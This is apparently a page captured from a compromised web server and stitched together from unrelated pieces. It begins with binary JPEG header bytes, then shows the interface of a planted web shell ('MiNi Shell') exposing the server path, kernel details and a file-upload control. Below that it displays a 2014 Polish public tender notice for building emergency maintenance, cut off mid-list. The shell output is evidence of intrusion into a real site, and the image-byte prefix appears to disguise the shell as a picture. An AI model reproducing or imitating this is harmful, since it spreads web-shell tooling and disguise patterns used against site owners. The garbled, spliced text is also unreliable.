JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140929/205317-N-2014.html

<p class="kh_header"><b>Bytom: Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego w nieruchomościach stanowiących 100% własności SRK S.A. położonych na terenie gmin Wałbrzych, Boguszów - Gorce, Sosnowiec, Czeladź, Będzin, Wojkowice, Bytomia, Radzionkowa i Rudy Śląskiej</b><br>
<b>Numer ogłoszenia: 205317 - 2014; data zamieszczenia: 29.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Spółka Restrukturyzacji Kopalń S.A. , ul. Strzelców Bytomskich 207, 41-914 Bytom, woj. śląskie, tel. 032 3513300, 3513301, 3513364, faks 032 3513309, -10, 3513369.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.srk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednoosobowa Spółka Skarbu Państwa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego w nieruchomościach stanowiących 100% własności SRK S.A. położonych na terenie gmin Wałbrzych, Boguszów - Gorce, Sosnowiec, Czeladź, Będzin, Wojkowice, Bytomia, Radzionkowa i Rudy Śląskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I
Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego w nieruchomościach stanowiących 100% własności SRK S.A. położonych na terenie gmin Wałbrzych, Boguszów - Gorce.
Część II
Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego  w nieruchomościach stanowiących 100% własności SRK S.A. położonych na terenie miast: Sosnowiec, Czeladź, Będzin, Wojkowice.
Część III
Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego  w nieruchomościach stanowiących 100% własności SRK S.A. położonych na terenie miasta Bytomia, Radzionkowa i Rudy Śląskiej.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta powinna być zabezpieczona wadium w wysokości: 
Część I: 1 700,00 zł  ( słownie: tysiąc siedemset złotych 00/100 ), 
Część II: 16 900,00 zł  ( słownie: szesnaście tysięcy dziewięćset złotych 00/100 ),
Część III: 7 300,00 zł  ( słownie: siedem tysięcy trzysta złotych 00/100 ),</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek w zakresie wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem głównych usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną usługą w ramach jednej umowy polegającą na wykonywaniu usług polegających na świadczeniu usług technicznego pogotowia awaryjnego o wartości minimum:
Część I: 20 000,00 zł brutto, 
Część II:  100 000,00 zł brutto, 
Część III:  80 000,00 zł brutto,
wraz z dowodami realizacji wszystkich usług ujętych w wykazie oraz jeżeli pozytywnie zweryfikowana zostanie przez Zamawiającego zdolność Wykonawcy do należytego wykonania zamówienia zgodnie z postanowieniami pkt. 5.3.4. SIWZ
Zamawiający na podstawie art. 22 ust. 5 ustawy Prawo zamówień publicznych zweryfikuje zdolność Wykonawcy do należytego wykonania zamówienia 
w szczególności w odniesieniu do jego rzetelności, kwalifikacji, efektywności 
i doświadczenia, z zastrzeżeniem postanowień pkt. 6A ppkt 4 SIWZ. 
W przypadku wykazania przez Wykonawcę w pkt. II tabeli w załączniku nr 4 do druku Oferta informacji o choć jednej usłudze niewykonanej lub wykonanej nienależycie (której wartość naliczonych kar umownych w ramach jednej umowy przekroczyła 10 % wartości umowy brutto) z przyczyn leżących po stronie Wykonawcy w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy i doświadczenia i zostanie on wykluczony z postępowania na podstawie art. 24 ust. 2 pkt 4 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca, wykazując spełnianie warunku, o których mowa w pkt. 5.1.2 i 5.1.3. SIWZ polega na zasobach innych podmiotów, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący go z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, obowiązany jest przedłożyć dokumenty dotyczące:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu przez Wykonawcę, przy wykonaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek w zakresie dysponowania osobami za spełniony, jeżeli Wykonawca wykaże, iż dysponuje osobami zdolnymi do wykonania zamówienia, w szczególności Wykonawca winien mieć do dyspozycji odpowiednio wykwalifikowany personel w celu obsadzenia stanowisk niezbędnych do realizacji zadania objętego zamówieniem tj.: do wykonywania prac ogólnobudowlanych oraz prac na instalacji elektrycznej, gazowej, wodnej, kanalizacyjnej, c.o. tj. co najmniej jedną osobą posiadającą stosowne uprawnienia do kierowania robotami ogólnobudowlanymi oraz na instalacji gazowej, elektrycznej, wod-kan, co. (wymagania odnośne c.o. nie dotyczą Części I - gmin Wałbrzych, Boguszów - Gorce).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek w zakresie wiedzy i doświadczenia za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem głównych usług  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, w tym co najmniej jedną usługą w ramach jednej umowy polegającą na wykonywaniu usług polegających na świadczeniu usług technicznego pogotowia awaryjnego o wartości minimum:
Część I: 20 000,00 zł brutto, 
Część II:  100 000,00 zł brutto, 
Część III:  80 000,00 zł brutto,
wraz z dowodami realizacji wszystkich usług ujętych w wykazie oraz jeżeli pozytywnie zweryfikowana zostanie przez Zamawiającego zdolność Wykonawcy do należytego wykonania zamówienia zgodnie z postanowieniami pkt. 5.3.4. SIWZ;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oświadczenia Wykonawcy w trybie art. 44 ustawy Pzp w związku z art. 22 ust.1
ustawy Pzp zgodnie z pkt. 5.1. SIWZ - załączniki nr 2, 2a, 2b, 2c, 2d do druku OFERTA.   
Wykonawca powołujący się przy wykazaniu spełniania warunków udziału  w postępowaniu w zakresie wiedzy i doświadczenia, potencjału technicznego, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów (załączniki nr 2a, 2b, 2c, 2d), zobowiązany jest uzyskać pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, które należy dołączyć do załączników nr 2a, 2b, 2c, 2d do druku OFERTA
2.	Formularz cenowy - załącznik nr 8, 8.1, 8.2 do druku OFERTA.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, za wyjątkiem ustawowej zmiany obowiązującej stawki podatku od towarów i usług oraz zmniejszenia zakresu rzeczowego, o którym mowa w § 1 ust.7 umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.srk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SRK S.A. ul. Strzelców Bytomskich 207, 41-914 Bytom 30,00 + VAT w przypadku odbioru osobistego (gotówka) lub pocztą (za zaliczeniem) w przypadku pobrania SIWZ ze strony internetowej - bezpłatnie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.10.2014 godzina 09:00, miejsce: Spółka Restrukturyzacji Kopalń S.A. 41-914 Bytom, ul. Strzelców Bytomskich 207 - sekretariat Spółki (II piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PODWYKONAWSTWO
          
Zamawiający nie wprowadza żadnych ograniczeń odnośnie zakresu prac, których wykonanie Wykonawca zamierza powierzyć podwykonawcy.
Powierzenie części zamówienia podwykonawcy:
1.	Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.
2.	Zamawiający żąda wskazania przez Wykonawcę w ofercie - Załącznik nr 5 - części zamówienia, której wykonanie zamierza powierzyć podwykonawcy lub podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby Wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1.
3.	Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust 2b, w celu wykazania spełniania warunków udziału w postępowaniu, o których mowa 
w art. 22 ust. 1, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie, na dzień zgłoszenia zmiany, spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I
 Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego w nieruchomościach stanowiących 100% własności  SRK S.A.  położonych na terenie gmin Wałbrzych, Boguszów - Gorce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje: zapewnienie działań pogotowia awaryjnego i obsługi technicznej przez całą dobę ( pod telefonem) na następujących zasadach:
1.	Wykonawca winien dysponować numerami telefonii w tym komórkowej oraz adresem mailowym dla potrzeb zgłaszania awarii lub zagrożenia.
2.	Czynności całodobowego pogotowia awaryjnego polegają na przyjęciu zgłoszenia o awarii, ustaleniu przyczyny, zabezpieczeniu skutków awarii, określeniu zakresu rzeczowego niezbędnego do usunięciu awarii, bądź usunięcia zagrożenia
3.	Zgłoszenia o usterkach i awariach Wykonawca przyjmuje całodobowo, w tym w dni wolne od pracy pełniąc dyżur telefoniczny. Zgłoszeń awarii dokonywać mogą pracownicy Zespołu Obsługi Technicznej oraz Punktów Obsługi Klientów Zamawiającego a także mieszkańcy budynków wykazanych w załącznikach 1,2,3. 
4.	W przypadkach wątpliwości co do zasadności zgłoszenia Wykonawca konsultuje zgłoszenie z Działem Technicznym Zamawiającego. 
5.	Obowiązkiem Wykonawcy jest niezwłoczne przystępowanie do prac i zabezpieczanie zgłoszonych awarii (czas reakcji Wykonawcy maksymalnie do  1 godziny od zgłoszenia na dojazd własnym pojazdem do miejsca awarii).
6.	W przypadku konieczności wezwania służb pogotowia technicznego gazowego, ciepłowniczego, elektrycznego itp tj. innych przedsiębiorstw specjalistycznych. Wykonawca podejmuje  realizuję wszelkich czynności we własnym zakresie
7.	W przypadkach wymagających powiadamiania służb ratunkowych (Straż Pożarna, Pogotowie Ratunkowe, Policja) Wykonawca zobowiązany jest do współpracy z odpowiednimi służbami jeżeli zachodzi taka konieczność, w tym zabezpieczanie miejsca w trakcie akcji i po jej zakończeniu (Zamawiający upoważnia Wykonawcę do podpisywania protokołów przejęcia miejsca objętego akcją ratowniczą). 
8.	Wykonawca dokonuje wszelkich zgłoszeń i uzgodnień z dostawcami mediów, stosownymi urzędami lub  instytucjami niezbędnymi dla przeprowadzania prac w celu usunięciu awarii bądź usunięcia zagrożenia
9.	Pracownicy Wykonawcy świadczący czynności całodobowego pogotowia awaryjnego, podczas usuwania awarii lub zagrożenia powinny posiadać przy sobie wydany przez Zamawiającego dokument upoważniający do wstępu do budynków i lokali zarządzanych i administrowanych przez Zamawiającego.
10.	Wykonawca zabezpiecza dla realizacji usługi środki ochrony osobistej,  odzież roboczą przyrządy kontrolno-pomiarowe, narzędzia  w zakresie niezbędnym dla wykonania przedmiotu umowy.
11.	Prace związane z wykonywaniem usługi winny być wykonywane zgodnie z przepisami i zasadami BHP, przepisami przeciwpożarowymi, sztuką budowlaną i technologią zawartą w Polskich Normach dotyczących budownictwa mieszkaniowego, Zamawiający zastrzega sobie prawo do wglądu w dokumenty dotyczące używanych materiałów, 
w szczególności w atesty potwierdzające dopuszczenie do obrotu. 
12.	Wykonawca ponosi pełną odpowiedzialność odszkodowawczą za straty spowodowane przez jego pracowników wskutek niewłaściwego wykonania czynności przy usuwaniu awarii .
13.	Wykonawca zobowiązany jest do wykonywania czynności usunięcia awarii, bądź usunięcia zagrożenia przy pomocy pracowników o kwalifikacjach i doświadczeniu zawodowym umożliwiającym jego wykonanie zgodnie z wymogami ujętymi w obowiązujących przepisach. 
14.	Do obowiązku Wykonawcy należy sporządzanie comiesięcznego zestawienia ilości 
i rodzaju usuniętych awarii z podziałem na nieruchomości i branże prowadzenie rejestru zgłoszeń awarii wpisywanie: daty, godziny, adresu miejsca awarii, danych personalnych dyspozytora oraz osoby zgłaszającej awarię. 
15.	Wykonawca informuje codziennie - na bieżąco koordynatorów Zamawiającego 
 o wystąpieniu awarii, podjętych czynnościach, zrealizowanych zgłoszeniach lub konieczności podjęcia ewentualnych dalszych działań..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.70.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II
Świadczenie kompleksowej obsługi technicznej i pogotowia awaryjnego w nieruchomościach stanowiących 100% własności  SRK S.A. położonych na terenie miast: Sosnowiec, Czeladź, Będzin, Wojkowice..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres przedmiotu zamówienia obejmuje: zapewnienie działań pogotowia awaryjnego 
i obsługi technicznej przez całą dobę ( pod telefonem) na następujących zasadach:
1.	Wykonawca winien dysponować numerami telefonii w tym komórkowej oraz adresem mailowym dla potrzeb zgłaszania awarii lub zagrożenia.
2.	Czynności całodobowego pogotowia awaryjnego polegają na przyjęciu zgłoszenia 
o awarii, ustaleniu przyczyny, zabezpieczeniu skutków awarii, określeniu zakresu rzeczowego niezbędnego do usunięciu awarii, bądź usunięcia zagrożenia
3.	Zgłoszenia o usterkach i awariach Wykonawca przyjmuje całodobowo, w tym w dni wolne od pracy pełniąc dyżur telefoniczny. Zgłoszeń awarii dokonywać mogą pracownicy Zespołu Obsługi Technicznej oraz Punktów Obsługi Klientów Zamawiającego a także mieszkańcy budynków wykazanych w załącznikach 1,2,3. 
4.	W przypadkach wątpliwości co do zasadności zgłoszenia Wykonawca konsultuje zgłoszenie z Działem Technicznym Zamawiającego. 
5.	Obowiązkiem Wykonawcy jest niezwłoczne przystępowanie do prac i zabezpieczanie zgłoszonych awarii (czas reakcji Wykonawcy maksymalnie do  1 godziny od zgłoszenia na dojazd własnym pojazdem do miejsca awarii).
6.	W przypadku konieczności wezwania służb pogotowia technicznego gazowego, ciepłowniczego, elektrycznego itp tj. innych przedsiębiorstw specjalistycznych. Wykonawca podejmuje  realizuję wszelkich czynności we własnym zakresie
7.	W przypadkach wymagających powiadamiania służb ratunkowych (Straż Pożarna, Pogotowie Ratunkowe, Policja) Wykonawca zobowiązany jest do współpracy 
z odpowiednimi służbami jeżeli zachodzi taka konieczność, w tym zabezpieczanie miejsca w trakcie akcji i po jej zakończeniu (Zamawiający upoważnia Wykonawcę do podpisywania protokołów przejęcia miejsca objętego akcją ratowniczą). 
8.	Wykonawca dokonuje wszelkich zgłoszeń i uzgodnień z dostawcami mediów, stosownymi urzędami lub  instytucjami niezbędnymi dla przeprowadzania prac w celu usunięciu awarii bądź usunięcia zagrożenia
9.	Pracownicy Wykonawcy świadczący czynności całodobowego pogotowia awaryjnego, podczas usuwania awarii lub zagrożenia powinny posiadać przy sobie wydany przez Zamawiającego dokument upoważniający do wstępu do budynków i lokali zarządzanych i administrowanych przez Zamawiającego.
10.	Wykonawca zabezpiecza dla realizacji usługi środki ochrony osobistej,  odzież roboczą przyrządy kontrolno-pomiarowe, narzędzia  w zakresie niezbędnym dla wykonania przedmiotu umowy.
11.	Prace związane z wykonywaniem usługi winny być wykonywane zgodnie z przepisami i zasadami BHP, przepisami przeciwpożarowymi, sztuką budowlaną i technologią zawartą w Polskich Normach dotyczących budownictwa mieszkaniowego, Zamawiający zastrzega sobie prawo do wglądu w dokumenty dotyczące używanych materiałów, 
w szczególności w atesty potwierdzające dopuszczenie do obrotu. 
12.	Wykonawca ponosi pełną odpowiedzialność odszkodowawczą za straty spowodowane przez jego pracowników wskutek niewłaściwego wykonania czynności przy usuwaniu awarii .
13.	Wykonawca zobowiązany jest do wykonywania czynności usunięcia awarii, bądź usunięcia zagrożenia przy pomocy pracowników o kwalifikacjach i doświadczeniu zawodowym umożliwiającym jego wykonanie zgodnie z wymogami ujętymi w obowiązujących przepisach. 
14.	Do obowiązku Wykonawcy należy sporządzanie comiesięcznego zestawienia ilości 
i rodzaju usuniętych awarii z podziałem na nieruchomości i branże prowadzenie rejestru zgłoszeń awarii wpisywanie: daty, godziny, adresu miejsca awarii, danych personalnych dyspozytora oraz osoby zgłaszającej awarię. 
15.	Wykonawca informuje codziennie - na bieżąco koordynatorów Zamawiającego 
